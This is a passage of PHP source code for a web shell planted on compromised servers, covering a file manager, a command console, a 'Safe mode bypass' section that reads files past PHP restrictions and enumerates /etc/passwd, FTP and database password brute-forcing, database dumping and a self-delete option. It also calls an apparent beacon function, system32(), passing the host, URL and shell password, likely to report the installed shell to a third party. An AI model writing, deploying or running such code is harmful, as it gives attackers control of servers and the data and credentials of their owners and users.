  611.         $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  612.         $tmp = array('name' => $dirContent[$i],
  613.                      'path' => $GLOBALS['cwd'].$dirContent[$i],
  614.                      'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  615.                      'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  616.                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  617.                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  618.                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  619.                     );
  620.         if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  621.             $files[] = array_merge($tmp, array('type' => 'file'));
  622.         elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  623.             $links[] = array_merge($tmp, array('type' => 'link'));
  624.         elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  625.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  626.     }
  627.     $GLOBALS['sort'] = $sort;
  628.     function cmp($a, $b) {
  629.         if($GLOBALS['sort'][0] != 'size')
  630.             return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  631.         else
  632.             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  633.     }
  634.     usort($files, "cmp");
  635.     usort($dirs, "cmp");
  636.     usort($links, "cmp");
  637.     $files = array_merge($dirs, $links, $files);
  638.     $l = 0;
  639.     foreach($files as $f) {
  640.         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  641.             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  642.         $l = $l?0:1;
  643.     }
  644.     ?>
  645.     <tr><td colspan=7>
  646.     <input type=hidden name=a value='FilesMan'>
  647.     <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  648.     <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  649.     <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
  650.     </form></table></div>
  651.     <?php
  652.     printFooter();
  653. }
  654.  
  655. function actionStringTools() {
  656.  
  657.     if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13(base64_decode($p)))));}}
  658.     if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode(str_rot13($p)))));}}  
  659.     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  660.     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  661.     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  662.     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  663.    
  664.     if(isset($_POST['ajax'])) {
  665.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  666.         ob_start();
  667.         if(function_exists($_POST['p1']))
  668.             echo $_POST['p1']($_POST['p2']);
  669.         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  670.         echo strlen($temp), "\n", $temp;
  671.         exit;
  672.     }
  673.     printHeader();
  674.     echo '<h1>String conversions</h1><div class=content>';
  675.     $stringTools = array(
  676.         'nested ROT13_base64' => 'ROT13_base64_decode',
  677.         'nested base64_ROT13' => 'base64_ROT13_decode',
  678.         'Base64 encode' => 'base64_encode',
  679.         'Base64 decode' => 'base64_decode',
  680.         'Url encode' => 'urlencode',
  681.         'Url decode' => 'urldecode',
  682.         'Full urlencode' => 'full_urlencode',
  683.         'md5 hash' => 'md5',
  684.         'sha1 hash' => 'sha1',
  685.         'crypt' => 'crypt',
  686.         'CRC32' => 'crc32',
  687.         'ASCII to HEX' => 'ascii2hex',
  688.         'HEX to ASCII' => 'hex2ascii',
  689.         'HEX to DEC' => 'hexdec',
  690.         'HEX to BIN' => 'hex2bin',
  691.         'DEC to HEX' => 'dechex',
  692.         'DEC to BIN' => 'decbin',
  693.         'BIN to HEX' => 'bin2hex',
  694.         'BIN to DEC' => 'bindec',      
  695.         'String to lower case' => 'strtolower',
  696.         'String to upper case' => 'strtoupper',
  697.         'Htmlspecialchars' => 'htmlspecialchars',
  698.         'String length' => 'strlen',
  699.     );
  700.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  701.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  702.     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  703.     foreach($stringTools as $k => $v)
  704.         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  705.         echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  706.     if(!empty($_POST['p1'])) {
  707.         if(function_exists($_POST['p1']))
  708.         echo htmlspecialchars($_POST['p1']($_POST['p2']));
  709.     }
  710.     echo"</pre></div>";
  711.     ?>
  712.     <br><h1>Search for hash:</h1><div class=content>
  713.         <form method='get' target='_blank' name="hf">
  714.             <input type="text" name="action" style="width:200px;"><br>
  715.             <input type="button" value="HashCracker.de" onClick="document.hf.action='http://www.hashchecker.de/hash.cgi?';document.hf.submit()"><br>
  716.             <!--<input type="button" value="hashcrack.com" onClick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
  717.             <input type="button" value="hashcracking.info" onClick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
  718.             <input type="button" value="md5.rednoize.com" onClick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
  719.             <input type="button" value="md5decrypter.com" onClick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> -->
  720.         </form>
  721.     </div>
  722.  
  723. <iframe src="http://www.md5decrypter.co.uk/" frameborder="0" height="50%" width="100%"></iframe><br>
  724.  
  725.     <?php
  726.     printFooter();
  727.  
  728.  
  729. }
  730.  
  731. function actionFilesTools() {
  732.     if( isset($_POST['p1']) )
  733.         $_POST['p1'] = urldecode($_POST['p1']);
  734.     if(@$_POST['p2']=='download') {
  735.         if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  736.             ob_start("ob_gzhandler", 4096);
  737.             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  738.             if (function_exists("mime_content_type")) {
  739.                 $type = @mime_content_type($_POST['p1']);
  740.                 header("Content-Type: ".$type);
  741.             }
  742.             $fp = @fopen($_POST['p1'], "r");
  743.             if($fp) {
  744.                 while(!@feof($fp))
  745.                     echo @fread($fp, 1024);
  746.  
  747.                 fclose($fp);
  748.             }
  749.         } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  750.  
  751.         }
  752.         exit;
  753.     }
  754.     if( @$_POST['p2'] == 'mkfile' ) {
  755.         if(!file_exists($_POST['p1'])) {
  756.             $fp = @fopen($_POST['p1'], 'w');
  757.             if($fp) {
  758.                 $_POST['p2'] = "edit";
  759.                 fclose($fp);
  760.             }
  761.         }
  762.     }
  763.     printHeader();
  764.     echo '<h1>File tools</h1><div class=content>';
  765.     if( !file_exists(@$_POST['p1']) ) {
  766.         echo 'File not exists';
  767.         printFooter();
  768.         return;
  769.     }
  770.     $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  771.     $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  772.     echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  773.     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  774.     if( empty($_POST['p2']) )
  775.         $_POST['p2'] = 'view';
  776.     if( is_file($_POST['p1']) )
  777.         $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  778.     else
  779.         $m = array('Chmod', 'Rename', 'Touch');
  780.     foreach($m as $v)
  781.         echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  782.     echo '<br><br>';
  783.     switch($_POST['p2']) {
  784.         case 'view':
  785.             echo '<pre class=ml1>';
  786.             $fp = @fopen($_POST['p1'], 'r');
  787.             if($fp) {
  788.                 while( !@feof($fp) )
  789.                     echo htmlspecialchars(@fread($fp, 1024));
  790.                 @fclose($fp);
  791.             }
  792.             echo '</pre>';
  793.             break;
  794.         case 'highlight':
  795.             if( is_readable($_POST['p1']) ) {
  796.                 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  797.                 $code = highlight_file($_POST['p1'],true);
  798.                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  799.             }
  800.             break;
  801.         case 'chmod':
  802.             if( !empty($_POST['p3']) ) {
  803.                 $perms = 0;
  804.                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  805.                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  806.                 if(!@chmod($_POST['p1'], $perms))
  807.                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  808.                 else
  809.                     die('<script>g(null,null,null,null,"")</script>');
  810.             }
  811.             echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  812.             break;
  813.         case 'edit':
  814.             if( !is_writable($_POST['p1'])) {
  815.                 echo 'File isn\'t writeable';
  816.                 break;
  817.             }
  818.             if( !empty($_POST['p3']) ) {
  819.                 @file_put_contents($_POST['p1'],$_POST['p3']);
  820.                 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  821.             }
  822.             echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  823.             $fp = @fopen($_POST['p1'], 'r');
  824.             if($fp) {
  825.                 while( !@feof($fp) )
  826.                     echo htmlspecialchars(@fread($fp, 1024));
  827.                 @fclose($fp);
  828.             }
  829.             echo '</textarea><input type=submit value=">>"></form>';
  830.             break;
  831.         case 'hexdump':
  832.             $c = @file_get_contents($_POST['p1']);
  833.             $n = 0;
  834.             $h = array('00000000<br>','','');
  835.             $len = strlen($c);
  836.             for ($i=0; $i<$len; ++$i) {
  837.                 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  838.                 switch ( ord($c[$i]) ) {
  839.                     case 0:  $h[2] .= ' '; break;
  840.                     case 9:  $h[2] .= ' '; break;
  841.                     case 10: $h[2] .= ' '; break;
  842.                     case 13: $h[2] .= ' '; break;
  843.                     default: $h[2] .= $c[$i]; break;
  844.                 }
  845.                 $n++;
  846.                 if ($n == 32) {
  847.                     $n = 0;
  848.                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  849.                     $h[1] .= '<br>';
  850.                     $h[2] .= "\n";
  851.                 }
  852.             }
  853.             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  854.             break;
  855.         case 'rename':
  856.             if( !empty($_POST['p3']) ) {
  857.                 if(!@rename($_POST['p1'], $_POST['p3']))
  858.                     echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  859.                 else
  860.                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  861.             }
  862.             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  863.             break;
  864.         case 'touch':
  865.             if( !empty($_POST['p3']) ) {
  866.                 $time = strtotime($_POST['p3']);
  867.                 if($time) {
  868.                     if(@touch($_POST['p1'],$time,$time))
  869.                         die('<script>g(null,null,null,null,"")</script>');
  870.                     else {
  871.                         echo 'Fail!<script>document.mf.p3.value="";</script>';
  872.                     }
  873.                 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  874.             }
  875.             echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  876.             break;
  877.         case 'mkfile':
  878.            
  879.             break;
  880.     }
  881.     echo '</div>';
  882.     printFooter();
  883. }
  884.  
  885. function actionSafeMode() {
  886.     $temp='';
  887.     ob_start();
  888.     switch($_POST['p1']) {
  889.         case 1:
  890.             $temp=@tempnam($test, 'cx');
  891.             if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  892.                 echo @file_get_contents($temp);
  893.                 unlink($temp);
  894.             } else
  895.                 echo 'Sorry... Can\'t open file';
  896.             break;
  897.         case 2:
  898.             $files = glob($_POST['p2'].'*');
  899.             if( is_array($files) )
  900.                 foreach ($files as $filename)
  901.                     echo $filename."\n";
  902.             break;
  903.         case 3:
  904.             $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  905.             curl_exec($ch);
  906.             break;
  907.         case 4:
  908.             ini_restore("safe_mode");
  909.             ini_restore("open_basedir");
  910.             include($_POST['p2']);
  911.             break;
  912.         case 5:
  913.             for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  914.                 $uid = @posix_getpwuid($_POST['p2']);
  915.                 if ($uid)
  916.                     echo join(':',$uid)."\n";
  917.             }
  918.             break;
  919.         case 6:
  920.             if(!function_exists('imap_open'))break;
  921.             $stream = imap_open($_POST['p2'], "", "");
  922.             if ($stream == FALSE)
  923.                 break;
  924.             echo imap_body($stream, 1);
  925.             imap_close($stream);
  926.             break;
  927.     }
  928.     $temp = ob_get_clean();
  929.     printHeader();
  930.     echo '<h1>Safe mode bypass</h1><div class=content>';
  931.     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  932.     if($temp)
  933.         echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  934.     echo '</div>';
  935.     printFooter();
  936. }
  937. if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
  938. function actionConsole() {
  939.     if(isset($_POST['ajax'])) {
  940.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  941.         ob_start();
  942.         echo "document.cf.cmd.value='';\n";
  943.         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
  944.         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  945.             if(@chdir($match[1])) {
  946.                 $GLOBALS['cwd'] = @getcwd();
  947.                 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  948.             }
  949.         }
  950.         echo "document.cf.output.value+='".$temp."';";
  951.         echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  952.         $temp = ob_get_clean();
  953.         echo strlen($temp), "\n", $temp;
  954.         exit;
  955.     }
  956.     printHeader();
  957. ?>
  958. <script>
  959. if(window.Event) window.captureEvents(Event.KEYDOWN);
  960. var cmds = new Array("");
  961. var cur = 0;
  962. function kp(e) {
  963.     var n = (window.Event) ? e.which : e.keyCode;
  964.     if(n == 38) {
  965.         cur--;
  966.         if(cur>=0)
  967.             document.cf.cmd.value = cmds[cur];
  968.         else
  969.             cur++;
  970.     } else if(n == 40) {
  971.         cur++;
  972.         if(cur < cmds.length)
  973.             document.cf.cmd.value = cmds[cur];
  974.         else
  975.             cur--;
  976.     }
  977. }
  978. function add(cmd) {
  979.     cmds.pop();
  980.     cmds.push(cmd);
  981.     cmds.push("");
  982.     cur = cmds.length-1;
  983. }
  984. </script>
  985. <?php
  986.     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  987.     foreach($GLOBALS['aliases'] as $n => $v) {
  988.         if($v == '') {
  989.             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  990.             continue;
  991.         }
  992.         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  993.     }
  994.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  995.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  996.     echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
  997.     if(!empty($_POST['p1'])) {
  998.         echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  999.     }
  1000.     echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
  1001.     echo '</form></div><script>document.cf.cmd.focus();</script>';
  1002.     printFooter();
  1003. }
  1004.  
  1005. function actionLogout() {
  1006.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1007.     echo 'bye!';
  1008. }
  1009.  
  1010. function actionSelfRemove() {
  1011.     printHeader();
  1012.     if($_POST['p1'] == 'yes') {
  1013.         if(@unlink(SELF_PATH))
  1014.             die('Shell has been removed');
  1015.         else
  1016.             echo 'unlink error!';
  1017.     }
  1018.     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1019.     printFooter();
  1020. }
  1021.  
  1022. function actionBruteforce() {
  1023.     printHeader();
  1024.     if( isset($_POST['proto']) ) {
  1025.         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  1026.         if( $_POST['proto'] == 'ftp' ) {
  1027.             function bruteForce($ip,$port,$login,$pass) {
  1028.                 $fp = @ftp_connect($ip, $port?$port:21);
  1029.                 if(!$fp) return false;
  1030.                 $res = @ftp_login($fp, $login, $pass);
  1031.                 @ftp_close($fp);
  1032.                 return $res;
  1033.             }
  1034.         } elseif( $_POST['proto'] == 'mysql' ) {
  1035.             function bruteForce($ip,$port,$login,$pass) {
  1036.                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  1037.                 @mysql_close($res);
  1038.                 return $res;
  1039.             }
  1040.         } elseif( $_POST['proto'] == 'pgsql' ) {
  1041.             function bruteForce($ip,$port,$login,$pass) {
  1042.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  1043.                 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  1044.                 @pg_close($res);
  1045.                 return $res;
  1046.             }
  1047.         }
  1048.         $success = 0;
  1049.         $attempts = 0;
  1050.         $server = explode(":", $_POST['server']);
  1051.         if($_POST['type'] == 1) {
  1052.             $temp = @file('/etc/passwd');
  1053.             if( is_array($temp) )
  1054.                 foreach($temp as $line) {
  1055.                     $line = explode(":", $line);
  1056.                     ++$attempts;
  1057.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  1058.                         $success++;
  1059.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  1060.                     }
  1061.                     if(@$_POST['reverse']) {
  1062.                         $tmp = "";
  1063.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  1064.                             $tmp .= $line[0][$i];
  1065.                         ++$attempts;
  1066.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  1067.                             $success++;
  1068.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  1069.                         }
  1070.                     }
  1071.                 }
  1072.         } elseif($_POST['type'] == 2) {
  1073.             $temp = @file($_POST['dict']);
  1074.             if( is_array($temp) )
  1075.                 foreach($temp as $line) {
  1076.                     $line = trim($line);
  1077.                     ++$attempts;
  1078.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  1079.                         $success++;
  1080.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  1081.                     }
  1082.                 }
  1083.         }
  1084.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1085.     }
  1086.     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  1087.         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  1088.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  1089.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  1090.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  1091.         .'<span>Server:port</span></td>'
  1092.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  1093.         .'<tr><td><span>Brute type</span></td>'
  1094.         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  1095.         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  1096.         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  1097.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  1098.         .'<td><input type=text name=login value="root"></td></tr>'
  1099.         .'<tr><td><span>Dictionary</span></td>'
  1100.         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  1101.         .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
  1102.     echo '</div><br><br>';
  1103.  
  1104.  
  1105.     printFooter();
  1106. }
  1107.  
  1108. function actionSql() {
  1109.     class DbClass {
  1110.         var $type;
  1111.         var $link;
  1112.         var $res;
  1113.         function DbClass($type) {
  1114.             $this->type = $type;
  1115.         }
  1116.         function connect($host, $user, $pass, $dbname){
  1117.             switch($this->type) {
  1118.                 case 'mysql':
  1119.                     if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  1120.                     break;
  1121.                 case 'pgsql':
  1122.                     $host = explode(':', $host);
  1123.                     if(!$host[1]) $host[1]=5432;
  1124.                     if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  1125.                     break;
  1126.             }
  1127.             return false;
  1128.         }
  1129.         function selectdb($db) {
  1130.             switch($this->type) {
  1131.                 case 'mysql':
  1132.                     if (@mysql_select_db($db))return true;
  1133.                     break;
  1134.             }
  1135.             return false;
  1136.         }
  1137.         function query($str) {
  1138.             switch($this->type) {
  1139.                 case 'mysql':
  1140.                     return $this->res = @mysql_query($str);
  1141.                     break;
  1142.                 case 'pgsql':
  1143.                     return $this->res = @pg_query($this->link,$str);
  1144.                     break;
  1145.             }
  1146.             return false;
  1147.         }
  1148.         function fetch() {
  1149.             $res = func_num_args()?func_get_arg(0):$this->res;
  1150.             switch($this->type) {
  1151.                 case 'mysql':
  1152.                     return @mysql_fetch_assoc($res);
  1153.                     break;
  1154.                 case 'pgsql':
  1155.                     return @pg_fetch_assoc($res);
  1156.                     break;
  1157.             }
  1158.             return false;
  1159.         }
  1160.         function listDbs() {
  1161.             switch($this->type) {
  1162.                 case 'mysql':
  1163.                     return $this->res = @mysql_list_dbs($this->link);
  1164.                 break;
  1165.                 case 'pgsql':
  1166.                     return $this->res = $this->query("SELECT datname FROM pg_database");
  1167.                 break;
  1168.             }
  1169.             return false;
  1170.         }
  1171.         function listTables() {
  1172.             switch($this->type) {
  1173.                 case 'mysql':
  1174.                     return $this->res = $this->query('SHOW TABLES');
  1175.                 break;
  1176.                 case 'pgsql':
  1177.                     return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
  1178.                 break;
  1179.             }
  1180.             return false;
  1181.         }
  1182.         function error() {
  1183.             switch($this->type) {
  1184.                 case 'mysql':
  1185.                     return @mysql_error($this->link);
  1186.                 break;
  1187.                 case 'pgsql':
  1188.                     return @pg_last_error($this->link);
  1189.                 break;
  1190.             }
  1191.             return false;
  1192.         }
  1193.         function setCharset($str) {
  1194.             switch($this->type) {
  1195.                 case 'mysql':
  1196.                     if(function_exists('mysql_set_charset'))
  1197.                         return @mysql_set_charset($str, $this->link);
  1198.                     else
  1199.                         $this->query('SET CHARSET '.$str);
  1200.                     break;
  1201.                 case 'mysql':
  1202.                     return @pg_set_client_encoding($this->link, $str);
  1203.                     break;
  1204.             }
  1205.             return false;
  1206.         }
  1207.         function dump($table) {
  1208.             switch($this->type) {
  1209.                 case 'mysql':
  1210.                     $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  1211.                     $create = mysql_fetch_array($res);
  1212.                     echo $create[1].";\n\n";
  1213.                     $this->query('SELECT * FROM `'.$table.'`');
  1214.                     while($item = $this->fetch()) {
  1215.                         $columns = array();
  1216.                         foreach($item as $k=>$v) {
  1217.                             $item[$k] = "'".@mysql_real_escape_string($v)."'";
  1218.                             $columns[] = "`".$k."`";
  1219.                         }
  1220.                     echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1221.                     }
  1222.                 break;
  1223.                 case 'pgsql':
  1224.                     $this->query('SELECT * FROM '.$table);
  1225.                     while($item = $this->fetch()) {
  1226.                         $columns = array();
  1227.                         foreach($item as $k=>$v) {
  1228.                             $item[$k] = "'".addslashes($v)."'";
  1229.                             $columns[] = $k;
  1230.                         }
  1231.                     echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1232.                     }
  1233.                 break;
  1234.             }
  1235.             return false;
  1236.         }
  1237.     };
  1238.     $db = new DbClass($_POST['type']);
  1239.     if(@$_POST['p2']=='download') {
  1240.         ob_start("ob_gzhandler", 4096);
  1241.         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  1242.         $db->selectdb($_POST['sql_base']);
  1243.         header("Content-Disposition: attachment; filename=dump.sql");
  1244.         header("Content-Type: text/plain");
